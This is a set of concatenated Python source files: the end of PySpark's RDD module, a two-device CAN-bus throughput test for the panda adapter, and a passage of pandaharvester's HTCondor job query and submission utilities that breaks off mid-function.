""" Return an JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> (rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> (rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available
<a href="http://dx.doi.org/10.1145/2452376.2452456">here</a>.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
for partition in range(self.getNumPartitions()):
rows = self.context.runJob(self, lambda x: x, [partition])
for row in rows:
yield row
def _prepare_for_python_RDD(sc, command, obj=None):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have the same life cycle as the created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
# There is a bug in py4j.java_gateway.JavaClass with auto_convert
# https://github.com/bartdag/py4j/issues/161
# TODO: use auto_convert once py4j fix the bug
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
command = (self.func, profiler, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_cmd, bvars, env, includes = _prepare_for_python_RDD(self.ctx, command, self)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_cmd),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec, self.ctx.pythonVer,
bvars, self.ctx._javaAccumulator)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
bulk_write_test.py
|
#!/usr/bin/env python3
import time
import threading
from panda import Panda
# The TX buffers on pandas are 0x100 in length.
NUM_MESSAGES_PER_BUS = 10000
def flood_tx(panda):
print('Sending!')
msg = b"\xaa"*4
packet = [[0xaa, None, msg, 0], [0xaa, None, msg, 1], [0xaa, None, msg, 2]] * NUM_MESSAGES_PER_BUS
panda.can_send_many(packet)
print(f"Done sending {3*NUM_MESSAGES_PER_BUS} messages!")
if __name__ == "__main__":
serials = Panda.list()
if len(serials) != 2:
raise Exception("Connect two pandas to perform this test!")
sender = Panda(serials[0])
receiver = Panda(serials[1])
sender.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
receiver.set_safety_mode(Panda.SAFETY_ALLOUTPUT)
# Start transmission
threading.Thread(target=flood_tx, args=(sender,)).start()
# Receive as much as we can within a few-second window
rx = []
old_len = 0
start_time = time.time()
while time.time() - start_time < 2 or len(rx) > old_len:
old_len = len(rx)
rx.extend(receiver.can_recv())
print(f"Received {len(rx)} messages")
|
htcondor_utils.py
|
#=== Imports ===================================================
import re
import time
import threading
import random
import multiprocessing
import tempfile
import functools
import traceback
import xml.etree.ElementTree as ET
try:
import subprocess32 as subprocess
except Exception:
import subprocess
try:
from threading import get_ident
except ImportError:
from thread import get_ident
import six
from pandaharvester.harvestercore import core_utils
from pandaharvester.harvesterconfig import harvester_config
from pandaharvester.harvestercore.core_utils import SingletonWithID
from pandaharvester.harvestercore.fifos import SpecialFIFOBase
# condor python or command api
try:
import htcondor
except ImportError:
CONDOR_API = 'command'
else:
CONDOR_API = 'python'
#===============================================================
#=== Definitions ===============================================
# logger
baseLogger = core_utils.setup_logger('htcondor_utils')
# module level lock
moduleLock = threading.Lock()
# List of job ads required
CONDOR_JOB_ADS_LIST = [
'ClusterId', 'ProcId', 'JobStatus', 'LastJobStatus',
'JobStartDate', 'EnteredCurrentStatus', 'ExitCode',
'HoldReason', 'LastHoldReason', 'RemoveReason',
'harvesterWorkerID',
]
# harvesterID
harvesterID = harvester_config.master.harvester_id
#===============================================================
#=== Functions =================================================
def synchronize(func):
"""
synchronize decorator
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
with moduleLock:
return func(*args, **kwargs)
return wrapper
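# A minimal usage sketch (hypothetical function name), assuming the
# module-level moduleLock above: the decorated body runs while holding
# moduleLock, so calls from different threads are serialized.
#
#     @synchronize
#     def refresh_shared_state():
#         ...  # only one thread at a time executes this body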
def _runShell(cmd):
"""
Run shell function
"""
cmd = str(cmd)
p = subprocess.Popen(cmd.split(), shell=False, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdOut, stdErr = p.communicate()
retCode = p.returncode
return (retCode, stdOut, stdErr)
def condor_job_id_from_workspec(workspec):
"""
Generate condor job id with schedd host from workspec
"""
batchid_str = str(workspec.batchID)
# backward compatibility if workspec.batchID does not contain ProcId
if '.' not in batchid_str:
batchid_str += '.0'
return '{0}#{1}'.format(workspec.submissionHost, batchid_str)
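# Example (hypothetical values): a workspec with submissionHost
# 'myschedd.example.com,mypool.example.com:9618' and batchID '1234' (no ProcId)
# yields 'myschedd.example.com,mypool.example.com:9618#1234.0'.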
def get_host_batchid_map(workspec_list):
"""
Get a dictionary of submissionHost: list of batchIDs from workspec_list
return {submissionHost_1: [batchID_1_1, ...], submissionHost_2: [...], ...}
"""
host_batchid_map = {}
for workspec in workspec_list:
host = workspec.submissionHost
batchid = workspec.batchID
if batchid is None:
continue
batchid_str = str(batchid)
# backward compatibility if workspec.batchID does not contain ProcId
if '.' not in batchid_str:
batchid_str += '.0'
try:
host_batchid_map[host].append(batchid_str)
except KeyError:
host_batchid_map[host] = [batchid_str]
return host_batchid_map
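# Example (hypothetical values): two workspecs on 'scheddA' with batchIDs
# '10.0' and '11', plus one on 'scheddB' with batchID '7.2', yield
# {'scheddA': ['10.0', '11.0'], 'scheddB': ['7.2']}; workspecs whose
# batchID is None are skipped.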
def get_batchid_from_job(job_ads_dict):
"""
Get batchID string from condor job dict
"""
batchid = '{0}.{1}'.format(job_ads_dict['ClusterId'], job_ads_dict['ProcId'])
return batchid
def get_job_id_tuple_from_batchid(batchid):
"""
Get tuple (ClusterId, ProcId) from batchID string
"""
batchid_str_list = str(batchid).split('.')
clusterid = batchid_str_list[0]
procid = batchid_str_list[1]
if not procid:
procid = 0
return (clusterid, procid)
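# Example: '123.4' -> ('123', '4'); '123.' -> ('123', 0) because the empty
# ProcId falls back to the integer 0. The batchid is expected to contain a
# '.' separator (callers append '.0' when it is missing).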
# def jdl_to_map(jdl):
# """
# Transform jdl into dictionary
# The "queue" line (e.g. "queue 1") will be omitted
# """
# # FIXME: not containing "+"
# ret_map = {}
# for line in jdl.split('\n'):
# match = re.search('^(.+) = (.+)$', line)
# if match:
# ret_map[match.group(1)] = match.group(2)
# return ret_map
def condor_submit_process(mp_queue, host, jdl_map_list):
"""
Function for new process to submit condor
"""
# initialization
tmpLog = core_utils.make_logger(baseLogger, 'host={0}'.format(host), method_name='condor_submit_process')
errStr = ''
batchIDs_list = []
# parse schedd and pool name
condor_schedd, condor_pool = None, None
if host in ('LOCAL', 'None'):
tmpLog.debug('submissionHost is {0}, treated as local schedd. Skipped'.format(host))
else:
try:
condor_schedd, condor_pool = host.split(',')[0:2]
except ValueError:
tmpLog.error('Invalid submissionHost: {0} . Skipped'.format(host))
# get schedd
try:
if condor_pool:
collector = htcondor.Collector(condor_pool)
else:
collector = htcondor.Collector()
if condor_schedd:
scheddAd = collector.locate(htcondor.DaemonTypes.Schedd, condor_schedd)
else:
scheddAd = collector.locate(htcondor.DaemonTypes.Schedd)
schedd = htcondor.Schedd(scheddAd)
except Exception as e:
errStr = 'create condor collector and schedd failed; {0}: {1}'.format(e.__class__.__name__, e)
else:
submit_obj = htcondor.Submit()
try:
with schedd.transaction() as txn:
# TODO: Currently spool is not supported in htcondor.Submit ...
submit_result = submit_obj.queue_with_itemdata(txn, 1, iter(jdl_map_list))
clusterid = submit_result.cluster()
first_proc = submit_result.first_proc()
num_proc = submit_result.num_procs()
batchIDs_list.extend(['{0}.{1}'.format(clusterid, procid)
for procid in range(first_proc, first_proc + num_proc)])
except RuntimeError as e:
errStr = 'submission failed; {0}: {1}'.format(e.__class__.__name__, e)
mp_queue.put((batchIDs_list, errStr))
#===============================================================
#=== Classes ===================================================
# Condor queue cache fifo
class CondorQCacheFifo(six.with_metaclass(SingletonWithID, SpecialFIFOBase)):
global_lock_id = -1
def __init__(self, target, *args, **kwargs):
name_suffix = target.split('.')[0]
name_suffix = re.sub('-', '_', name_suffix)
self.titleName = 'CondorQCache_{0}'.format(name_suffix)
SpecialFIFOBase.__init__(self)
def lock(self, score=None):
lock_key = format(int(random.random() * 2**32), 'x')
if score is None:
score = time.time()
retVal = self.putbyid(self.global_lock_id, lock_key, score)
if retVal:
return lock_key
return None
def unlock(self, key=None, force=False):
peeked_tuple = self.peekbyid(id=self.global_lock_id)
if peeked_tuple.score is None or peeked_tuple.item is None:
return True
elif force or self.decode(peeked_tuple.item) == key:
self.delete([self.global_lock_id])
return True
else:
return False
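# Minimal usage sketch (hypothetical host string; assumes a FIFO backend is
# configured for SpecialFIFOBase): acquire the global lock before refreshing
# the shared condor_q cache, and always release it afterwards.
#
#     fifo = CondorQCacheFifo(target='myschedd.example.com',
#                             id='myschedd.example.com,140123456789')
#     key = fifo.lock()
#     if key is not None:
#         try:
#             pass  # refresh the cached condor_q result here
#         finally:
#             fifo.unlock(key=key)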
# Condor client
class CondorClient(object):
@classmethod
def renew_session_and_retry(cls, func):
"""
If RuntimeError, call renew_session and retry
"""
# FIXME: currently hard-coded
to_retry = True
# Wrapper
def wrapper(self, *args, **kwargs):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorClient.renew_session_if_error')
func_name = func.__name__
try:
self.schedd
except AttributeError:
if self.lock.acquire(False):
is_renewed = self.renew_session()
self.lock.release()
if not is_renewed:
errStr = 'failed to communicate with {0}'.format(self.submissionHost)
tmpLog.error(errStr)
tmpLog.debug('condor session not established and renewal failed')
raise Exception(errStr)
try:
ret = func(self, *args, **kwargs)
except RuntimeError as e:
tmpLog.debug('got RuntimeError: {0}'.format(e))
if self.lock.acquire(False):
is_renewed = self.renew_session()
self.lock.release()
if is_renewed:
if to_retry:
tmpLog.debug('condor session renewed. Retrying {0}'.format(func_name))
ret = func(self, *args, **kwargs)
else:
tmpLog.debug('condor session renewed')
raise
else:
tmpLog.error('failed to renew condor session')
raise
else:
tmpLog.debug('another thread is renewing condor session; skipped...')
raise
tmpLog.debug('done')
return ret
return wrapper
def __init__(self, submissionHost, *args, **kwargs):
self.submissionHost = submissionHost
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorClient.__init__')
# Initialize
tmpLog.debug('Initializing client')
self.lock = threading.Lock()
self.condor_api = CONDOR_API
self.condor_schedd = None
self.condor_pool = None
# Parse condor command remote options from workspec
if self.submissionHost in ('LOCAL', 'None'):
tmpLog.debug('submissionHost is {0}, treated as local schedd. Skipped'.format(self.submissionHost))
else:
try:
self.condor_schedd, self.condor_pool = self.submissionHost.split(',')[0:2]
except ValueError:
tmpLog.error('Invalid submissionHost: {0} . Skipped'.format(self.submissionHost))
# Use Python API or fall back to command
if self.condor_api == 'python':
try:
self.secman = htcondor.SecMan()
self.renew_session(init=True)
except Exception as e:
tmpLog.error('Error when using htcondor Python API. Exception {0}: {1}'.format(e.__class__.__name__, e))
raise
tmpLog.debug('Initialized client')
@synchronize
def renew_session(self, retry=3, init=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorClient.renew_session')
# Clear security session if not initialization
if not init:
tmpLog.info('Renew condor session')
self.secman.invalidateAllSessions()
# Recreate collector and schedd object
i_try = 1
while i_try <= retry:
try:
tmpLog.info('Try {0}'.format(i_try))
if self.condor_pool:
self.collector = htcondor.Collector(self.condor_pool)
else:
self.collector = htcondor.Collector()
if self.condor_schedd:
self.scheddAd = self.collector.locate(htcondor.DaemonTypes.Schedd, self.condor_schedd)
else:
self.scheddAd = self.collector.locate(htcondor.DaemonTypes.Schedd)
self.schedd = htcondor.Schedd(self.scheddAd)
tmpLog.info('Success')
break
except Exception as e:
tmpLog.warning('Recreate condor collector and schedd failed: {0}'.format(e))
if i_try < retry:
tmpLog.warning('Failed. Retry...')
else:
tmpLog.warning('Retry {0} times. Still failed. Skipped'.format(i_try))
return False
i_try += 1
self.secman.invalidateAllSessions()
time.sleep(3)
# Sleep
time.sleep(3)
return True
# Condor job query
class CondorJobQuery(six.with_metaclass(SingletonWithID, CondorClient)):
# class lock
classLock = threading.Lock()
# Query commands
orig_comStr_list = [
'condor_q -xml',
'condor_history -xml',
]
# Bad text of redundant xml roots to eliminate from condor XML
badtext = """
</classads>
<?xml version="1.0"?>
<!DOCTYPE classads SYSTEM "classads.dtd">
<classads>
"""
def __init__(self, cacheEnable=False, cacheRefreshInterval=None, useCondorHistory=True, *args, **kwargs):
self.submissionHost = str(kwargs.get('id'))
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0} thrid={1} oid={2}'.format(self.submissionHost, get_ident(), id(self)), method_name='CondorJobQuery.__init__')
# Initialize
with self.classLock:
tmpLog.debug('Start')
CondorClient.__init__(self, self.submissionHost, *args, **kwargs)
# For condor_q cache
self.cacheEnable = cacheEnable
if self.cacheEnable:
self.cache = ([], 0)
self.cacheRefreshInterval = cacheRefreshInterval
self.useCondorHistory = useCondorHistory
tmpLog.debug('Initialize done')
def get_all(self, batchIDs_list=[], allJobs=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobQuery.get_all')
# Get all
tmpLog.debug('Start')
job_ads_all_dict = {}
if self.condor_api == 'python':
try:
job_ads_all_dict = self.query_with_python(batchIDs_list, allJobs)
except Exception as e:
tmpLog.error('Exception {0}: {1}'.format(e.__class__.__name__, e))
raise
else:
job_ads_all_dict = self.query_with_command(batchIDs_list)
return job_ads_all_dict
def query_with_command(self, batchIDs_list=[]):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobQuery.query_with_command')
# Start query
tmpLog.debug('Start query')
job_ads_all_dict = {}
batchIDs_set = set(batchIDs_list)
for orig_comStr in self.orig_comStr_list:
# String of batchIDs
batchIDs_str = ' '.join(list(batchIDs_set))
# Command
if 'condor_q' in orig_comStr or ('condor_history' in orig_comStr and batchIDs_set):
name_opt = '-name {0}'.format(self.condor_schedd) if self.condor_schedd else ''
pool_opt = '-pool {0}'.format(self.condor_pool) if self.condor_pool else ''
ids = batchIDs_str
comStr = '{cmd} {name_opt} {pool_opt} {ids}'.format(cmd=orig_comStr,
name_opt=name_opt,
pool_opt=pool_opt,
ids=ids)
else:
# tmpLog.debug('No batch job left to query in this cycle by this thread')
continue
tmpLog.debug('check with {0}'.format(comStr))
(retCode, stdOut, stdErr) = _runShell(comStr)
if retCode == 0:
# Command succeeded
job_ads_xml_str = '\n'.join(str(stdOut).split(self.badtext))
if '<c>' in job_ads_xml_str:
# Found at least one job
# XML parsing
xml_root = ET.fromstring(job_ads_xml_str)
def _getAttribute_tuple(attribute_xml_element):
# Attribute name
_n = str(attribute_xml_element.get('n'))
# Attribute value text
_t = ' '.join(attribute_xml_element.itertext())
return (_n, _t)
# Every batch job
for _c in xml_root.findall('c'):
job_ads_dict = dict()
# Every attribute
attribute_iter = map(_getAttribute_tuple, _c.findall('a'))
job_ads_dict.update(attribute_iter)
batchid = get_batchid_from_job(job_ads_dict)
condor_job_id = '{0}#{1}'.format(self.submissionHost, batchid)
job_ads_all_dict[condor_job_id] = job_ads_dict
# Remove batch jobs already retrieved from the remaining set
if batchid in batchIDs_set:
batchIDs_set.discard(batchid)
else:
# Job not found
tmpLog.debug('job not found with {0}'.format(comStr))
continue
else:
# Command failed
errStr = 'command "{0}" failed, retCode={1}, error: {2} {3}'.format(comStr, retCode, stdOut, stdErr)
tmpLog.error(errStr)
if len(batchIDs_set) > 0:
# Jobs not found via either condor_q or condor_history; mark them as unknown workers in harvester
for batchid in batchIDs_set:
condor_job_id = '{0}#{1}'.format(self.submissionHost, batchid)
job_ads_all_dict[condor_job_id] = dict()
tmpLog.info( 'Unfound batch jobs of submissionHost={0}: {1}'.format(
self.submissionHost, ' '.join(list(batchIDs_set)) ) )
# Return
return job_ads_all_dict
@CondorClient.renew_session_and_retry
def query_with_python(self, batchIDs_list=[], allJobs=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobQuery.query_with_python')
# Start query
tmpLog.debug('Start query')
cache_fifo = None
job_ads_all_dict = {}
# make id sets
batchIDs_set = set(batchIDs_list)
clusterids_set = set([get_job_id_tuple_from_batchid(batchid)[0] for batchid in batchIDs_list])
# query from cache
def cache_query(requirements=None, projection=CONDOR_JOB_ADS_LIST, timeout=60):
# query from condor xquery and update cache to fifo
def update_cache(lockInterval=90):
tmpLog.debug('update_cache')
# acquire lock with score timestamp
score = time.time() - self.cacheRefreshInterval + lockInterval
lock_key = cache_fifo.lock(score=score)
if lock_key is not None:
# acquired lock, update from condor schedd
tmpLog.debug('got lock, updating cache')
jobs_iter_orig = self.schedd.xquery(requirements=requirements, projection=projection)
jobs_iter = []
for job in jobs_iter_orig:
try:
jobs_iter.append(dict(job))
except Exception as e:
tmpLog.error('In updating cache schedd xquery; got exception {0}: {1} ; {2}'.format(
e.__class__.__name__, e, repr(job)))
timeNow = time.time()
cache_fifo.put(jobs_iter, timeNow)
self.cache = (jobs_iter, timeNow)
# release lock
retVal = cache_fifo.unlock(key=lock_key)
if retVal:
tmpLog.debug('done update cache and unlock')
else:
tmpLog.warning('cannot unlock... Maybe something wrong')
return jobs_iter
else:
tmpLog.debug('cache fifo locked by other thread. Skipped')
return None
# remove invalid or outdated caches from fifo
def cleanup_cache(timeout=60):
tmpLog.debug('cleanup_cache')
id_list = list()
attempt_timestamp = time.time()
n_cleanup = 0
while True:
if time.time() > attempt_timestamp + timeout:
tmpLog.debug('time is up when cleanup cache. Skipped')
break
peeked_tuple = cache_fifo.peek(skip_item=True)
if peeked_tuple is None:
tmpLog.debug('empty cache fifo')
break
elif peeked_tuple.score is not None \
and time.time() <= peeked_tuple.score + self.cacheRefreshInterval:
tmpLog.debug('nothing expired')
break
elif peeked_tuple.id is not None:
retVal = cache_fifo.delete([peeked_tuple.id])
if isinstance(retVal, int):
n_cleanup += retVal
else:
# problematic
tmpLog.warning('got nothing when cleanup cache, maybe problematic. Skipped')
break
tmpLog.debug('cleaned up {0} objects in cache fifo'.format(n_cleanup))
# start
jobs_iter = tuple()
try:
attempt_timestamp = time.time()
while True:
if time.time() > attempt_timestamp + timeout:
# skip cache_query if too long
tmpLog.debug('cache_query got timeout ({0} seconds). Skipped '.format(timeout))
break
# get latest cache
peeked_tuple = cache_fifo.peeklast(skip_item=True)
if peeked_tuple is not None and peeked_tuple.score is not None:
# got something
if peeked_tuple.id == cache_fifo.global_lock_id:
if time.time() <= peeked_tuple.score + self.cacheRefreshInterval:
# lock
tmpLog.debug('got fifo locked. Wait and retry...')
time.sleep(random.uniform(1, 5))
continue
else:
# expired lock
tmpLog.debug('got lock expired. Clean up and retry...')
cleanup_cache()
continue
elif time.time() <= peeked_tuple.score + self.cacheRefreshInterval:
# got valid cache
_obj, _last_update = self.cache
if _last_update >= peeked_tuple.score:
# valid local cache
tmpLog.debug('valid local cache')
jobs_iter = _obj
else:
# valid fifo cache
tmpLog.debug('update local cache from fifo')
peeked_tuple_with_item = cache_fifo.peeklast()
if peeked_tuple_with_item is not None \
and peeked_tuple.id != cache_fifo.global_lock_id \
and peeked_tuple_with_item.item is not None:
jobs_iter = cache_fifo.decode(peeked_tuple_with_item.item)
self.cache = (jobs_iter, peeked_tuple_with_item.score)
else:
tmpLog.debug('peeked invalid cache fifo object. Wait and retry...')
time.sleep(random.uniform(1, 5))
continue
else:
# cache expired
tmpLog.debug('update cache in fifo')
retVal = update_cache()
if retVal is not None:
jobs_iter = retVal
cleanup_cache()
break
else:
# no cache in fifo, check with size again
if cache_fifo.size() == 0:
if time.time() > attempt_timestamp + random.uniform(10, 30):
# have waited for long enough, update cache
tmpLog.debug('waited enough, update cache in fifo')
retVal = update_cache()
if retVal is not None:
jobs_iter = retVal
break
else:
# still nothing, wait
time.sleep(2)
continue
except Exception as _e:
tb_str = traceback.format_exc()
tmpLog.error('Error querying from cache fifo; {0} ; {1}'.format(_e, tb_str))
return jobs_iter
# query method options
query_method_list = [self.schedd.xquery]
if self.cacheEnable:
cache_fifo = CondorQCacheFifo(target=self.submissionHost, id='{0},{1}'.format(self.submissionHost, get_ident()))
query_method_list.insert(0, cache_query)
if self.useCondorHistory:
query_method_list.append(self.schedd.history)
# Go
for query_method in query_method_list:
# Make requirements
clusterids_str = ','.join(list(clusterids_set))
if query_method is cache_query or allJobs:
requirements = 'harvesterID =?= "{0}"'.format(harvesterID)
else:
requirements = 'member(ClusterID, {{{0}}})'.format(clusterids_str)
if allJobs:
tmpLog.debug('Query method: {0} ; allJobs'.format(query_method.__name__))
else:
tmpLog.debug('Query method: {0} ; clusterids: "{1}"'.format(query_method.__name__, clusterids_str))
# Query
jobs_iter = query_method(requirements=requirements, projection=CONDOR_JOB_ADS_LIST)
for job in jobs_iter:
try:
job_ads_dict = dict(job)
except Exception as e:
tmpLog.error('In doing schedd xquery or history; got exception {0}: {1} ; {2}'.format(
e.__class__.__name__, e, repr(job)))
batchid = get_batchid_from_job(job_ads_dict)
condor_job_id = '{0}#{1}'.format(self.submissionHost, batchid)
job_ads_all_dict[condor_job_id] = job_ads_dict
# Remove batch jobs already retrieved from the remaining set
if not allJobs:
batchIDs_set.discard(batchid)
if len(batchIDs_set) == 0 or allJobs:
break
# Remaining
if not allJobs and len(batchIDs_set) > 0:
# Jobs not found via either condor_q or condor_history; mark them as unknown workers in harvester
for batchid in batchIDs_set:
condor_job_id = '{0}#{1}'.format(self.submissionHost, batchid)
job_ads_all_dict[condor_job_id] = dict()
tmpLog.info( 'Unfound batch jobs of submissionHost={0}: {1}'.format(
self.submissionHost, ' '.join(list(batchIDs_set)) ) )
# Return
return job_ads_all_dict
# Condor job submit
class CondorJobSubmit(six.with_metaclass(SingletonWithID, CondorClient)):
# class lock
classLock = threading.Lock()
def __init__(self, *args, **kwargs):
self.submissionHost = str(kwargs.get('id'))
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0} thrid={1} oid={2}'.format(self.submissionHost, get_ident(), id(self)), method_name='CondorJobSubmit.__init__')
# Initialize
tmpLog.debug('Start')
self.lock = threading.Lock()
CondorClient.__init__(self, self.submissionHost, *args, **kwargs)
tmpLog.debug('Initialize done')
def submit(self, jdl_list, use_spool=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobSubmit.submit')
# Get all
tmpLog.debug('Start')
job_ads_all_dict = {}
if self.condor_api == 'python':
try:
# TODO: submit_with_python will meet segfault or c++ error after many submissions; need help from condor team
# TODO: submit_with_python_process has no such error but spawns some processes that will not terminate after harvester stops
# TODO: Fall back to submit_with_command for now
# retVal = self.submit_with_python(jdl_list, use_spool)
# retVal = self.submit_with_python_process(jdl_list, use_spool)
retVal = self.submit_with_command(jdl_list, use_spool)
except Exception as e:
tmpLog.error('Exception {0}: {1}'.format(e.__class__.__name__, e))
raise
else:
retVal = self.submit_with_command(jdl_list, use_spool)
return retVal
def submit_with_command(self, jdl_list, use_spool=False, tmp_str='', keep_temp_sdf=False):
# Make logger
tmpLog = core_utils.make_logger(baseLogger, 'submissionHost={0}'.format(self.submissionHost), method_name='CondorJobSubmit.submit_with_command')
# Initialize
errStr = ''
batchIDs_list = []
# make sdf temp file from jdls
tmpFile = tempfile.NamedTemporaryFile(mode='w', delete=(not keep_temp_sdf),
suffix='_{0}_cluster_submit.sdf'.format(tmp_str))
sdf_file = tmpFile.name
tmpFile.write('\n\n'.join(jdl_list))
tmpFile.flush()
# make condor remote options
name_opt = '-name {0}'.format(self.condor_schedd) if self.condor_schedd else ''
pool_opt = '-pool {0}'.format(self.condor_pool) if self.condor_pool else ''
spool_opt = '-remote -spool' if use_spool and self.condor_schedd else ''
# command
comStr = 'condor_submit -single-cluster {spool_opt} {name_opt} {pool_opt} {sdf_file}'.format(
sdf_file=sdf_file, name_opt=name_opt, pool_opt=pool_opt, spool_opt=spool_opt)
# submit
tmpLog.debug('submit with command: {0}'.format(comStr))
try:
p = subprocess.Popen(comStr.split(), shell=False, universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# check return code
stdOut, stdErr = p.communicate()
retCode = p.returncode
except Exception as e:
stdOut = ''
stdErr = core_utils.dump_error_message(tmpLog, no_message=True)
retCode = 1
errStr = '{0}: {1}'.format(e.__class__.__name__, e)
finally:
tmpFile.close()
tmpLog.debug('retCode={0}'.format(retCode))
if retCode == 0:
# extract clusterid and n_jobs
job_id_match = None
for tmp_line_str in stdOut.split('\n'):
job_id_match = re.search(r'^(\d+) job[(]s[)] submitted to cluster (\d+)\.$', tmp_line_str)
if job_id_match:
break
if job_id_match is not None:
n_jobs = int(job_id_match.group(1))
clusterid = job_id_match.group(2)
